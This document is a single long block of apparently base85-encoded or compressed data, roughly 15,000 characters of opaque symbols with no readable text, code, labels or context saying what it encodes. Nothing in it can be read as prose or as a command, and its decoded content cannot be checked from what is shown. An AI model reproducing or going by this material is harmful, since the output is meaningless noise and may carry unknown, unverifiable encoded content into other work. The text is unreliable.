z8TlfG1%Ql&_9?mY6_Ow7D?aJ3Z}o!?huQw#LK!aQ2sX_Pj0THAz23*jT|%ei7&*cm z1j=<c30!wG5)D^%p-oEUx*HqU-Lz{BTxbKUTWb_(ITD<L`yqTD7#=Syny<M2CV?1} zhC8~izlrDi8#~wE*p~ObFNuI_9~hp1QAa#*#dp5l+3I~8Wg_jEc0%%*!{s>L=1yMN z${>mievU2d)gMz=v?9`?kBf014A>l5N}Fqw9cj_6VV^e)pM<pNQ(>Q989s?=(QRR$ zpBO%a)1ps@eSC(GGc8&V`>Zg0hNnfJ3HuZnK4a6OP3l594#f?h@oCZ4uuq2Jlb#lB z3;Wz=_)JQRjt~1>XZTD_i*|&4;tZdA)1ni?KIdS>&N5gn!bApXXK68M(aNR~)qY!o zxojjY`e3+l&4!OHExIM_^NQh<oEF^`_StOsj82Qb5cc_j`1H=kUR`2=(|}!q6$FWt zf2o4;`XdTD^tlQq=(!3e>eB_@p-)w>PCZ@0;rdtwN9xH6-l~sOFj;phI9g9saIo%B zaI9`qaJ+5;Vk;%IJYE0$VkyBS{jUm6)&HX4z4|)}X6b)Y@B#fl70lEBsNh5TZUyJ* z+Z9}>|4P9k{Y3?r=+7y*On+KIx9(SPrCy`pYP|v|MR=tOY|~4{*RT?`P&sSGcb0O> zVT694a<a5URZcmd66aXud`6t3lyjpvZ&1!n;=D>ZH;Xe~IfcgPX64)|&W>Wqc$YYX z%2_AQHs#za&Oa$<vpDzTR7E~0Z@W~$%i{d4avm4w&y`a)*7{GB^OQI@C}*2EYn1b} zI3HC`U7V%L*&@z`%6Uedvy`)4ocAf`S#eHO&Mt9|Rn80I9HpGH?$mEkPC2XBufnN{ zEH)+dzA8ZOp3yG~Q~ni)I6qg;1aa!hnJCV8lyk5+k1D5AoK4C(T%5a<bEG(btDLur z^XJN$EY6=O=V)<mP)<=3)zxXhE91rasPau0XQ^^d66Zpks>oC2Ek^~2ny!A2a%PD$ zT{#~R=NRS86Xz|;`H(n=DCazJCg2o-B!k4UE<hWMqgg~{_p!yvc5udejU3JP(cgH2 z#pj?o9L)~+H>RXUS?6G>PRt_5Ac1qY=PaKbPx{Qh1I<b6AhE!~JY>0Bj%qolY>_k` zlQeD!z9uWM>;$H=9MbPcXus6Vc+ZV&rBX=bde%pLdKF<vt1!(4KQtuM)FH81AJbiu zCy>oihr~0r6S)XGpXabK>0SE{=0<CZf4M5bi0PhBg3hE*xd!a|LZ8JyTlvOJms8{* zSs?m@H&<@Vw%0sHw@V@%oX4jeEzaVkA>(3R@ZVJ_^xd2vQ~JkI0DDGGMh7CEp_JTE z4f~`TDu#wzv1LxTep|)NUb=0Ql=d3-EAr+LQ#7lrqPXV0n6UchNHni9fU%58IijDY zyB{I8dh-t7h6>xyBKkpal+jJnk0Hd`fKD4l_)`s08$_On1zxu3^A|OrKpuxRs$(=F zLSdQOFWIBGoyjsmn~Lp1y&_lHqi|?hBk$L;hTpFzkP9akUouA_OGswY>?~9(TF4}9 z@6T9c?#=RZ&|zp(5No8^))1>2A@?{gFS`|UdTH+Aw=N%rRShlv_dagP6SEqte~(>_ zs|>pulYVd0@0JRRV=j*14k>onBp~vG)P;)|7HXX5z&2fFl`_ETpAoO!AD=qI=7~0r zfo9J5L-Nl!$cPI&NF?5OkIgsH>RTM2JtHe`7J^e)&<M4NEts9ssdpl>DmqtRVHKB~ z!{^vM-$awhggl<Q7@YSjjZ49maolz5WHgC!+(<Xc%1EUZv1*~T$GEK<NlC-33i4Qb zKQg5kZ6s|MM3N;ti^7~-wrTU2wK0)Vo(I#Qy*?Ce80yvHcZ<ec$E5z~nce9f-yh?# z5h<!6Df>8wcL;mbbH$9}vq9U8;=cziGm1MxSB{kxpH+S9jgNuBhlz~8P#fc9NB=oa zuTykV!`qnf@z0g|dLu;N*&R7Jfn%T>!^c3^fB6_lwAs<#*Q{I@u4jfnU)BA&zF!1d z#ej%ZHWTia7@$$tZ*jjwSkVmm-^hjM#G3K^7J5@`#>MJUbba_WgsC01q{ooF+-HgH z0WLu2!_ib0Lh`;W*kuWhc518i@vL7laK%s<O)d(74*h)?iAECy<iu7K0c8skQ3U*9 zq!;Db^Gk|=77n}2?y_8cCtMU|A&XcMJwOX>Ffv#FEh}HqhfG#Q5_9tj(i39ZPj&<P zC<*{+eXzS6N@?+Q1dW7$h+y?l!A#HTTz#J;*PthLN7q-gA*MC;JzEU{0Cs$`xs)v^ zA}s@<>ivyvhK2s6+bbh)wouMm$X=*&`2hVSE`!F8BDo;?EXWqM>%YxYdk{8E>Y`B3 z!!&5Zt8AiVqr5zgeT<#-<8pIm>TB4pFaq@NlajG7&>zRCC11KdXq;mRpYv%9pU$mC z+gA2KCk&gv!6SaOD?ITtuxul}nJ^<q?L5TfsYt!J9hhSG{Mh*BMV~GBywRR=H*t0E z;{0u)QJg5L*bOpyJ+OgujZ*3hKFQW3te`1WvQh0$P!;O6J5lnPx#8<!?BD%|^h1Sh z#R~2_jo0?5+fLE4diyi`vXdtJpp&oKi7@Oi9dWEJ>0HXu&+Vmlbg_;W+TBNZ4iwto z+CQw>lL*{5tl7T1-qM5-W0%~giSf%|%S-}J3~N2|UP@h3{jlb{haH$5i8N`?+<gs_ zEk}r{=<+p5R_-h9uh`S}+b5BX+d0MX^aLr=9?~nck6SRMJ>7q=z1=>c-t$)y*x63i zhc$_Q809gA%ZnyyD0J+7GVdC8-jfgxO?P1AN&M)cGxl9?S@r~XQ+eSogg*PVx8B@& z!uvP#I#>KZcxy6`?IX%*@B^AIkdX}P>;&03<Z6$K6w@HRqB4SAho6*rTWwuMRbx47 zmJU>uxTw#np$i5{OhrYbuYQkwaYOJRvh*|kbIe);F|Jv6RrOIez^@;j!u6iX57s); z@2=Tb86dYtM()0q1FP;Dv$|i<(r8MaS~WJ+-FXp9&foMzhbCBq183^vS>~l9i>{Z0 z)!x0FW%k_2cWV!m1l&T^L2cKC)g!uBF60?b>zlJ-{vk?^0Y?6E#9W(VFu1P(HCnxU zoto=3m>kXZzdl>YgY*O3hrd9rX3gqouz0wz4ogL1V0=KaH5d<%&(jHW&uuBTAll#7 zO9>|Pg4~%dh7LcRPIE=1{YLhbQI*c0*=n3}+w{JwXsszHG1`sU?(U+U7|6kwOG*NJ zLeA)5XY3t`F2WWm&pESufcIP!+9K9qELMZMFz`reW>;05R;6hRbL+GQqcnLvrRlx5 z7lZ#ary}RvODC5nz|C42^9RthO3SihBG0t;BU2T|kORnaz+N>Onn}KjF6~n>WXzQr zYcGnflH2BAYZ}k2KVoO75-^ly+Cbqr&?!T+tV6kHZKW-k=U;0kQp!o#E^u44PwPLq zvi|+JxX%#ji2IzIlMsdUm0NvrH61H&Wb(Yi(xL5N+axnZePBr3r+(`|pJkQqL!Fco za5GA|HLj}=^PoM-N8U4+s3eGiaz_rrWJt82X6I_j((MeKS+o4=e#GJdT(IXy`tHJu zFBZP2$6ZZBdrtW#BFyf3-)G@=r8ZU`e%EO@Dv3Gz#XZts!>QLGDSpFTUwJ&{A7<;F znMQX<j9C9xLqfLuFE=MUC6w}4S+vE~Ra`m6CDzV5TRY$OwwjP+NkBM8*eHVuOqfDg zVo%s$!sKRQVYMVm0^O_@M>nfQ?hY1KOQK@6w5pi!ONi|_5<GH3-86iXn}%V{5DRrj zLK3@KEeT;(i^E{GB*I`BtXM6I>5{ps&zHC@(>)Qt{5f;wD&(qj>E%~eopYAQ*nib> z?BfP)Ps-7%_l6wPS@5MCH5LmFx(npt{;*;7LSkNOyU>2YJsb?`C+l9l-wiU{5DkrG zMQ==K53w|32E7I)58=P{)dNEr6fwbQy$#1K<U-lcV9mhx6Pa0sddY;eawsEpO+UE; z;3}<O9lRjyUMu*5yvWVf`p+NjW?Ogq=+f|##(QRX&qyV)nc8)74@pigL<Bn+u6Pis zEp$wTBz3*Ais|2VCUwkS;n^C}+;SqCQ}h(#8KEoFW#WSldv1(Obh#YlvVp@Q%cU{w z)id!f+RA5`_nyjka%OoKep#VoMLWg&1<Aw+6TfEV*L;cJDdl&tx8DoLd4sSe6m|8a z&G#>~;ICEa#+|!FxYi(meOT?>O7^LqGw$n(t$Bgn5CVB|gj6jJ$;@I4W<FI4*U5<@ zw%Dhq-YGe`r;v7Nj5ui++6hg1m(DDA8(AcUj_`YpKl9X#Vo{J`$;UmWI({*7%c3Wa zRnOYPCX*AT-sh!eq&uASh;SW;mLk`F<?~WI{4snW{?R!Sz<1%&iJyoMwS_#V2~uJ+ zkrRuYX~qDZshvU@=5)JvuQgj+Y{k;KRf#20(Oz9Y5gE+#cxa)`=U)xE&|;>#lcu_d zBl|MdJ!q<X2!agUcK2wpBRHrD^8gUMlH!5E*x~`f7)Wwdv2E@QjDK>kZ0dTU7@}k{ zMY{*FEC*)_=LWgsyyvcC4_;7rk&6jkb?;0@&WAeyE$`%S^SSEeQ~zWxxWsIeWDnh{ z;x;V5B$cSC5)}zeoS~P=67t(NZrVxk-sxnejVN`F{^`dI2(q-nVcW>!NpZHtOik9^ zsui>kX3KC9gA?%x#~=QUM2TDve6?P?BC@g;+c9dL9=MrG8W#i?t58O(DcE+|1;Lg7 z^##ErS;w<yRu=>hR_^cx!IMrHWyZv{Uz`zxHx<1v2$l;@CMR++ZLceW$547&xYrfI z9yTohXIBKT{R1nk$Q8l2QwugXg{)EKGRQ*aImGCTqq1_FT=7xVTi?S0lI*f1SGg}Z zuDhLr7H$A!aUxTHWUGVObWUYtY>8zRNMcr2v4#IdB$Zy|SRn&@JRvX0PD%R3duCEE zT+9@!2Ut{yMWKUvuSLo7`YKSk-o=#6T&rcoto=B2m#i1swTvi4I}yFFZ*%yv5&7&| zd){1!)Y}N{bFCrup&Bk@PKPwEJ{x$|Dk47qigpaf7Dvqv{G9jaU#19tPdjEceA%a7 zMD_Au@eu9`deJ}CtkpmJ;+$b`T3WDd=*!-__Prr25>`du?cLXwk%V4Py4(PBh_i)b zZE#d-COzG5uii`*wWecjoh|Ynw5C4vbh{^ZLfV_F{~oB3FxSCni-*h_cEr+xlY~bY ziB9!4x1}dFlQZcaqZ&+EPq%BC%@%IiX-z}8xm7z*9GY7eo#tvTk4f2=;mbVkBg(Xu z-+<oSq+%c7bN@<nnuxS(O=Z!n;x380>Q59_%WToI_evRu@;O&fWBPRfjiMd$kAFfG zUO)e(iq)2yf81@((5~D@3t<y2T3RZtxq?%4qY1Uo1Fx{0VqyQit3i^a>{D3#@MX71 zT6<o6*8Bbt%N};iFZx`2k^FwKcSR9Vmpqyfe%C5mw8PR~#ZGSL$xCV~wov&w+5^wE zvl!cR?BlrXwqaC0vzb=Gb0QN`+Pka&thx63v%BisqEb#4M<uD`TzhAwHLs52QlLrx zcEW>J-$VX(@5k1=SAC>q9?YOWrBFt99>1hJi-+VTak)_o0uq@mw7=1rKlrN7?4vp} zxLm6^s5KQ2c~<o$9l7=+qbH|(54TN`?npY!$=9)uv;$mcWuZ&j(pbR3mR5aus@x)d zs5)>Y9XQnJz;N%iMS8D0(yEh@t~(y-I?B=AasQUIKhkmicG6Fgx=IJote4c4tDm%n zV;|Ap`E8wVVYg>i(gDz3ydS7(*A7Ud(_F)vXnEfQv}EQfLC7}nHJx~AjjP|n(hrTV zHPZaj_$eo6r5!@!TQz*IR{uC4w{55O+e(S->whM#sY(Ziq|`A8wfeQ0!WysYMi$b) zq^wlhm)TtGJob_FkCd0%DBPfss)Sl*>#;Vl;}YEP9Q<0v)5g?MvXqmSF;c>bfv2T} z%5QCfY(XorC8-K*V2;nztT6iW230MoeNI=O$V+OV9i@~s=Js%73I;bBt%%=bn$mmG z0tQ#8M&uTmre5uM_^aActEdwUjh3!uG3(lO>_gF493gEN*Z%x2yyHCW-mY{`?zswP zg_XnMKHe^;C(8FNW7)2@XcH$GOM?GiihGdK{y&QQuPAP_bTbrJTI&B%T+jb_irYdz z{m-Jfdnr+b;!5fM=TO{MN+T3kN*JNI;@6AfN`e2UP+V1(FH_v(6!Gg&+#}<=Del@c zRgmjm%UmwBcU1{X$MsA~9s7!O_S#R$qScqb0W)uHzWkSc`I~(Cn|=8kefe8cUBfX{ z{w|EcuqMZCZ0Wh&!6vM-Y=^erm$_|SEIbLfz3N<FH?CMDBhU5oSSAEN!q9GQ<}bZn zarP%3W37gUMB)XL!=G_@ylq8Hu_bR>@Ey%HTr)+i6O7|@syI3?*kpgb-m536?O%T- zw<@yeEK!5MDvo+p_+)v$%niX!#Zh^bI!HxWB5YFWF5hx_idHs?TdU3`xs$5SjdI^u zbuQVxz3SXV`;+5Hv+A5{O?*{gVbwXa{fV3LD2@rpPH<XrT)+)fY1$vp!g*P`_Uilb zBsF{W0twCD7WkOGn^6?JSKp$!Ue-M1oLYGm7rK=9tqLTk*V?B9&68;tVzBo2Y}Me# zp^AD*BiO6iK9Y2jy;{mZvF+6&co1;$V`SiSZ6<lPo>!3&l25L!>td%$qV7(gYb!xg zf)U~Dxg6-~a$7k2`@)%j7|C4a6CcUPq8t;~z-DsUpZtWCcDQvO7YWO0fxfDak`_gv z$L&u<@kOyUa2vt?2^W2?ZASn0DefD%7Qb*;-oQ@Yp}O)Yp2fDnAOU?~m(!I`1&*>} zEAA68<EbjRF=#Q$>F%lue6#AD&HjW4>j!^fbn**SFZgn5zSDh!e*)a0ZQ)#Yi4gyH zNW`1@6zSy!9+h-s^QL*bV(m3cc?nKsvHdxP-xwSsU6Zo-P^|rR&o8}=EtXH$Ud-ZD zx3Zssx8zZADmZXm<}Y8Lfp<`hP*vK(&G-2<>E6s|d;_%1O>(dMTL|WOyAqdQz0TD+ zK6-WZ#kyKor<S>OdU0X~Rooi1@FM)C%|x6&c8Di-Y6if4jxc}b-Wl*7+Ol*T>}W0X zDdA-7TNTy$t_2KnZKR(q7Ehw)+AOXl&tRjV_U}z2t+f}o1!?B>x8Z)R4GQ7?c%BGj z_2Ye2>}%<p&5q7@@k`B5u-CM!al}@8Z{RODQ7PW@K>bCFFMF%c^Rl-MRft1)FK&+C zDWl9HqZ`@fvH{ws{)(Oc%$>Zy_~MJ9%-8HYR>f-BhqR`YJ-+;EW3McC-ELBB>0vFt z{MKRIu6xRFy~@6$U3vOEPoa=x_ufqog=t-OZ#s^h|9C^*+U-x=E^lw#rQTN9eEA0h z-;#*%w}(&ebR7iCDoKHR7b}{v0qL#S3kybs4_t==2`VB24wE}GY>|k4Q)i*Rn|ihT z<>F|x`?Fi;`dsUM70>u8He+@u&+pmmA3Yi42cQB{5o$nf)G{G^wFsKpf5QfNvt`<a zv}qUE{AO-07c(gIp{v$6?E?HSOJOL=yL2NK+M=e{gerGyncK9AXEfJ(tV5?yH*&)N z2b$+8E&J5k#;7`4yW+Snds|^m$C|X7qbqNh&GlRL9}m%*Ep@_m-(wLf!ZP1-RPlni z*){HnrJYaU5%5*ze)(CX!Yu8$SLJK@)o`R+;qpVyE$tny<7T&cBAXM=-`a-ISx1&` z>+9O4xwh56H{{6Qj(i+<E(FeIpCT8M_Z%uV)tn@Q+3tabbY*BtVO$d}dYqD?hKv&R zYk~%aX?s@mU;B~huB;82s>~*?(sR9uoQ7w#=6c(gubfVzzpEsKefe*TkT5zf+3!vc z#uuiO;=4gBWA1IXBf&m6-jwFb-m1`o&MzB+4pe?~VXBLXXD@QOC{jb4qfJ%xx$9tX z9BIE9=h;L;Z0cKmu0~(x{z9MUP|yhm@YR<-AvIDW3(fPgSWmx#q0dgzz9SRQM$NOo zUUvj<$MV?$t%1q!n18N0I7}7ib;-FnD(Hv=!PO>8v6c5@v$cw<IM;?k-;`Lbq0ndd z<wp5d#B|HE&KhIPyLbHE<f!F&pXZ7WY=-i5@;Ew?vgXO=+0OF|o=SQDGHcYn1H)|l zI8+&|N`*ow9pTGgKkUsWSBo5Y*mrmw8N=F}T*u|D$<=!B;1_rKva3MnTn3Fhrg37_ zsGyZ!C+sY+#WRkh`<f=Ims(-7*GN6lVY<hHgpV5RGB%$Udx!n3&f1Al8g{%UT9ZwI zQ}EhlfYyjO9Seuo09A#)I2dzjdpuUS2>oBeE8Wwl$O(@vIE4$Ht4!{J=<Avgo<)Kw zxoD&W^dtHRUWXPX^Xi{yEgpnQz)Om&2w|+*O-79qEz!XtMPqv+e7>bS!bT$krsD!r zaN2jgsU5BlB!cTYH<9})K72!wzrW1`H9l@~ZHcA?e(TgG*9IXni<>hS?QvwH)#TbL zWF|WPue;7zkgRancd*og4!p0(Nt^wRdh{Zpb*^1PuZ6CzvUj$=A(Yhnw|QajM7%Xm zo0iQiURPhS%i?W%z*q5<qM>J?N8L2^urKqOZW_85QqQ}hp^ZXARljPkkD*G8uu7BZ zo370x1P=9VW?r*2`6@QuXWs!2XIo(!h|4&s#z3Sm|Ev#X@`{)3-aImURlX=p&D_L{ zWcN-Ma+p@J!T!W}!?jiDsUC328#4%p;VxZ~$%>afS3qE~v=gSK9|uNBByYtglV{MB z2sI^IH#L35pr&W%pcq9OKF>CvXA>l?%<pOQTPOR!BMMY1pic8po;v%EvG7Ulzv<E@ zT!6Ux<Hx2!TQ_O-WmfL;L$W(Vrp8*|gbSdOkX226&zEuuL4a#3B)R*1nRQUV-%&x$ zvrSWZ3#q-YyBG}f?|p}uS_SK=uC+~y;(FR)^A|$z(>Sn#;-1A6bTc$JLUB9b;&Luv zsq=Z-<LVXpvYg`+7`l8V6gO1)9fRVE$EpG?zfNoFY)v@|&4s<@+D0Et&?>5{v)j1_ zSj#+%8B(FVbw`%g^>x*ewou+rjs)XA4P|bVK7&)@Y4;p1W;EB;NNH!g?S)!nVcZ_b zTf63geG9p3SIb=JD3td@MR_@@Hz@CCVanU#%U4dJyyp>95c<#otrp6gd45Wm@}5_e zw*%wHit>I&yN1bbSGj!oSzN_tGHw$Nj_Z9e+L!quNL}cw_&7LJQP<6vQ&(LmCZc>k zh5K5?Q?Q0)0C!xV^)q*3k2zZm$zvPm4Plo<YSFc}fA^<gRt6Zr&=PLa+g$2<4pcS{ zz6GHxcD*5ZJPZbH*RaDrSG5=%?NX(sl?&6FjU|KTsxC}p()OkZswzB}l{>C5p36$2 z5JK}W@qB=aROh*x!O#lYRFZ`!9%Fqb52g=WOz!Q>3Yq9gFg@mRELO*op`y+2YW0uj zm~w-!Vyk@zl%tRRH!WHQh`rH2-jUV?PM_~yDs1#|RjOJln6(PlaT~Z`Le5kww%$hy zVDoO~d(E{4#jpueWtw+wLA&XPg20|I0)un*CpSXJFoo*Ne}?1wTLp=aeF=#zCl!{` zo^hXommY<_tiqnrvY#n7%_f~SvkS4K947V6D+Y?30TcRpK`V%_<lz#0LLE)H!{}wN z5&op0Sa@;=#p*q)RXS5Zob$oeS~d$j(9fcV$g?s&!lPpgjjC1DcDUMEmrT*}&tj4L z0OLc(M3B`;Yuu3|pM)~ENbhI2d){I>0!8VPL1C}vsGrS1p|(H0Fs>PtZYQ4rJKK<2 zQAF_C)1?snv&)fsR}WJAJc7|+q(bUz6;ki|N~G>^C7QL&^_puZYD`Giy6<>Kc<4K! z0=LQJU^bdB)m7CqRc44xPHl#zF~gc%J1aV{l^qhF6knN_*0qLH1(MS1|K?cxw~LI0 zl)7S@uVN!*`&i4@=b~BBh;eMoQPzK!la`LS6LBpvu=4fko)5GNHsHIAK}HuseZGat z<VQ5LY0W4tf0wrZ$R|)6!~)w8*+BXr7}qkLPf39CzQ?yripCK2NR?Q3ZS}9QlD)>9 z1ghDeY$h$}wzl72v6mveXgT`gi*S8m4O6I49EU}_{G&Npiu)7~Z9iA1OG)Ee5EpUn zMNA}qEQ6VgM@6UeS`Kxz18IAV10Xp<sM*H_U70)G=E<6?S%$}XB6gLVCtExRxx*!U zr*@e1^dY|NI$w61KjE&p7E<?H@1WFi^%`j5((Cm^nl(R&k!&`(Qz<vKU@*o(U6_dj z-xi8b^(r>5%Lp-Bj32Yw73^D;n(DDNnv?HNJ6!%bk2Rw(6mt>#i|cP`t_oOcr&{c< z@2h>tj8Im3_v-B@Nyh3;%)>^@mmNF@L5Kgc=ldiFqGacKQe=x}>Vp><X4_aHrPOuQ zJKWJbt7vGB7vB)=(T;kXJ1VZJqu%O{?q{-!N0hi&(sa}#71~d9pkFtEMq+Uu9lWTx zM(xNSOe{Et9di#!d(%BA?Jaj)+A+@+{Y>-Nn8x=rr33iTDcABc5a$ltKW8?!5HZ2% zPE;_85B7To^pj;I2EUuJK+-Q=xfNSJ{wF6YE-=V1r0nBXTT8KH))uSV;@xN4ViRE9 z;t&wE#VNpy6jaRGeNwiWIqdHKV2X!$ylK>qBHjp5p<3j8UMl5|r>FyoPX&UpafgHQ zEwx+wq4*Hm>FF=2VYynR8pX=4?lozInmtB7R<=&@8n&Hnoo^2NlmnRdv`_8TKc{** z`dzdr@wpkc>%`J7s=-pJE2YDz#T-?OLq;tQ8MQbRrD}1=sKp_vg?&ehwtv_G_boJ) z6nrqyDEI--ptXlo!TSTriXt9Tg;y4L+zvx2nF^4QssJ#GPKcDASF0%^Be`DGuQ{=^ z*ev#6LkwMKQ}%I%j5N1#CxNv1OR5Oc=r5^4NW0Sz((W%w&XK0qTK*utPkY}&A)Kn% z=LHc|dk+e?x3sKLY}Mw)=_91qXD2nduN_s#Wb2MkYM_oZzsVd_-C(j9-C#mmaae_o zt18f?=BA+P?ZnB_hqIH)LV`?hEk$}@7WIf{Q}8wG@shO5S5@T=Rh75CqAG8x(h2HZ zRuxr|uUC)yxI-z8FVXDb#zW{1QA*L%h#21M9;)Va8J-qzvsK0?&?ci3=#a4qbcP2d z&Zr#i$m@a}Va$KiJ&c}^E;0t_n=(Kd8ZtmZCmEn%mv#heO?>5!Co-`;F>y^nhWOk$ zlCsqlCICuUP_F4ft}f;1&im+Ck&n9IyTUiq>YHgx&5pM}F4{1#V6z=qfA?`Tntc|D z0#;}BYEogBfpUm;2pK-6mUfwA(2|ckC$#*K<*21YXnDKu3WSm%_U91t;|}V_Y*>_V zIfRa<xlSAB#THiP*K3Vft5{}cw~h%ovk_1(+dq^w9<yoLIw$n;gD6PaA;|oGBEXfs z$I1dI9D&0n&2yG~E6!LtyanwhONf%Faxt>W{|XUFd<>C5lMkuV3YN;J{qa$f;(j&5 zL|8EG$Su~nhf|=V6o|MzWjZ>6G}!(2L4l-8isg!*icg5`-DB+VkPougya}mR?U`~k zb*9bp4Q-}Xi_<=%(cX8kR%H_U#38oq-*ZH_Guis$3<1oO((dIpZKkbrkBKn^^CL|w zw{l&~A!%)+f%(pIH10^WS`NXOykNw2pYWwg<z^y4S?HS>tI+P?!7yDYn`?h%5?7eE z)VJB<T6)V&i)}9@hm7Rhu>HtQA3<uG`y+ZwO$U*lR+7^;k(A!!2%fU<s<-Unl8Lud z_KkDcUG<2<tRwxIS}PflBozQ@5s+RN>)m4>cfdUh!^txYPfsweHJ4Sz2acS$RxS38 z(8Y^un5#Qe4p`bP=e(bWyzQZs!zu6$tz24QHm~&z9U;JdOn}*AgQ}ZMRi3>_v7;#p zcb02jCtMiU;JyP3%pZ^Yz<pEoY4`iIGhSEX^%h<+cpVOYf6iPL9WF8-^XWefa6y1D zIYfU4L3#wD<Mz2Tk!@sF*pc!32VZe=)yBFTV^6Q^<Gv}j&OOZAXh!II+(%_G<33ms z74_k`CR`1;8ppM9MN`1+IYQI4x%;xD4TZ|E@UPX+o`Yoe!O(~*B!ogE*7JMtAOi!H z|KZR%v9f0KPl(s1okkbvJHuEhOcSl3M{w<QRGJ-u6&diqGi`yfh`q9G^0uL>&Dh5_ z<gSY>f&xzb8?f~jxC)0qQxDvgC=p-I(tk@Dy)xKFvX1TyVkCp{lEEM{P_5AO<Ig-8 zXznk`9S_tA^ruswz;@-7m2%)0J-&ypl8DWLe^XvlCG=iZl%0VDih_~vz-kG~+!YwD z{7(fg$R|dc-&bFs3Iu?WwpcfoL@4dUH%N1I;mX6cvsOx5L`i5rTNYc{EWJEIm^e1< z1%y2wj(9|x^$cHMBVSLg;_F-FYuY~&+D7Pwp@goM(0C*C;6Z8c=6+J<)<BjN%(b&u zyYHmkUk+>`oOZ7Z+}5k))1;AqNrFZ%J}*fhm!yAtSMNqPimPYozvtFQRsKkU1Pd0+ zSBY!+>ap-ws;=+j-K#s>iJ2iWS4zwom!(hJ{O;2DXNf;R;%}DtLobcrJNq+EBDF}Q z3oL@Wn@Sq;hy-n_Cg?qadhn$wy6#1@<K7z(e^Z`K(R(j@Z;rgb`u2bDdEJmu=+)EW z`sN^9?c%y9elKjnHJEH(-6XD$@dMZYxBcD6C6nWMl6h|68N?IAbCGpkJI}j3#k}tY z4*VYePnu1i@Vv{@!t*+hPWT0${+ih|oM#+Q7EdA1N}gJtXLz>pH1o9ae8yv2Z#E6) z8Ot+?Cx_=@o)Vr%d49z6GS6O~Gdw20*%Z%n4bMoP+j%DO<na{oEazFz^Y1*r=Gnz_ zl;;dj4CQq4jN`eNCx_=@o)VrlJR5j6^K9dhzrM@>*YKc*Q^n%5ibY=)68}}GfmC6J zr|L&Ma22Xh-Kt_?RMpHQ-@Q&d)bjk8=hr-uzex_0qmbu8o?Cgw^2k32k5gRXzgO-u zIf8zZW7N|o$F`sM_@8{r<aj(_a%{ps5;p?Refx=-;-;LYMLgRcr5^K)ydz;k$3@+9 z@ME<3e6wlZopFEu-UHV<o-DALl9G;Go&1>DvG_KVV`8ew@$meG&iPB0lrEU>UQ}9Q zGOZ?TLpZFtmpgHFkN=Vivm^Z`ljAAMFHhaAl$EEACodefjPSOkOT$L4F}|xJEQ`3k zzuOuPb8@9zGS4P?!fA%Wf5IT&aFf{~dVQOLQpat;QeYkM7r^7dC&Tc5pv3>2<--}^ z*)aTj7)s+xIQROfbQXdL^1av`?*hirtnnkwj%B<%fmuMwSK59w?>B}0rM)E`QR9;G zNN;2j4(_P$9}B~wz#{yQhoLv@{~_g(@4+q8YQnDsZU7DdZUfRSs{HfA<@<p6d-3ld zj?b$qkKAx2_52gdcKIG0R_{)rq>s0$760qP{@}OrzmAHW!Jj@gnQlf(2j~Fa1sn++ z1Dp!H8dwB$0apVvfg6C6ft!Kf0`3G}4{Qa_0G<Yp26h1xfR0<tjvIl4fm4CWz>&a7 zz_GwQ;B;USZ~|~Oa1wAma3XLca0+l6a2&7>csKAk@DAW<;GMv;z%*cd5_${3;lO)= zV}U8aNkD3={tEehi1&rS)xZMadf<0}n}L0RJAu-FEkJ2^9Y}YW&H{^owp+~(Coln6 z40Hk?0geVP20j2>0xSY@Xs-HoDR4FKQV_wrn}LFNf(IM%m;M)gyB7E|?>7Pk&qo3U zzXUJ#;xG8$3cLk)1}Ob*9cA>lv^Q346dp>ykHlZbk>H8o*;wAofm4BQU>?u|ECMbE zt^}?Ct_MQ@OdEl#fZKpHqr&Hvz@5B53Ty!izMldP2Fkcu4Q%IK#)I`6W{2RNjFZSX z68v@IFXK5GSOrW6RsgerYk>2BGR|attOYLPeGyQ`fsD^8-euf91N<&<8*n|a8CU~s z1NH;TICva*hW96c7l1Nu5^gg)h68T}#sOvg+yK0nclZvbc|ad<B~U~=YJuy3&j7Ci zZU!a-Wqb_*?&ZA<cpO*_JPWJ^T9bS5ZdpOu(naOv&|T-kf|5lAf`5gJmJ~P(RxT=c zmzzpTo#mbdMFcKiv;d@(u#)*p3!LuKQs<J=62UJc%voCIEGsB4^^`3ra6arQUu9ZU z>MSTLE0rRc7A`6)Sl})#TjeY%bvp}|E^`xJvV8uMMbQ4TM?6alN~G&me#_>Qf+~=a zXQT|OT;$T77V!%`B@1NMP|22imMtqSb4w-oh6!b{bN=%Ai<ZoPc!`WBm2*j{=aC}k z(t@Rw1;6eRdrG>aI^7g={v-1jf!qtqO3TZ`wRbLAR3hW3ltxoim2<)Tk_81zBtL16 zrSnTxIi-;0PNI~UdfIkwciYZixR5N%=PoLl>nW#Dk$1{Ax4Qu35%DjazjV=(RdXe{ zSM4ZQX-NqUO3mlaUs6^uf8i=ga#>mFBa*zy#GE=;ibBri3(6KPqv<dC=HYNV^-8C# zppYU_mrMN03sk?5jC)aus`cDR*~$vO<DpvxWmJA)e^XIuxqGgsgi<Xi3O9XEn_XH= zaKH_Yc$P`0h4Eo-Z+wVUE?g#+8ErjR+FDhxe6DKirPO-<BL#EI7d<Ln-HoSnC2|-~ zOA6d8O3N0{U0Aw8$d)PcPK&8ZM&5fDy`*&R!=A#zg0i{gf|lTrG_t#NLFp1QHr6ZB zIlarL`f_eL=x4NDH@;lfjok@d*1Idp7*{>nxK}MJFu4~kEm%0W)FYkIlirF_&yt06 z9~Ml<KivLK17|KD5k29HN}RoMPer^0_Y8z`_O4T;PZ$H`?p}kx+n=I2OADO~OP8u~ zqt<i=t_yCcVZku!#zpZ9_nGP8veLx`CC+7wsAmuEIp=>FM_DE+Tz6819$fGB%~#;C z5T!5SurtzDy>Yl;Wx)cETQJsHSX#DpK6FZvFGY70y`#2Zm*BUvH<Hlyix}bVMTLtB zga|GzT`q{aXvva-N9HeaKD^3Z;4Ejb6hJK`Zpr**lzv&+qWJ_sC8>bBtaOP`4TG>q z9D_EN7Zga>niiEi=l3Rj;kI)|@I8#XwErcz-Cg-ec<*9EBMsbkMsVA?plH#Oh0?SO z6csV(s8BuPMzZXUD!u$w+z3ijmB`p|mb>Y*rBV_#H(Wla$h;Au94ZYp-$aVQ(72@H z#(U4$3csr?q@CowH{Qy7Z^GH##FwH_&zMr9K~ZkE(4?ODm!{O?ug0J=G6rdWP+%bh zne{=KP()_I?)OWRG6_mE-z_mF4`=zRa(98O%OWkNl2fypkyq)01s<7H3HK~v)EOhM zY<>yIS?(5`k_?z{LBp~z0S<S9kP$^h+yyJ$#-LPFwLxDbDboFlxlCHCyIkGjG9NP6 zbibFcTKaJ5l0^&DMCn{ou)JW2tn0vJPk6zg29Tm}f@F$}Iu(7Bb>k?W<Zs@dGJ4D% 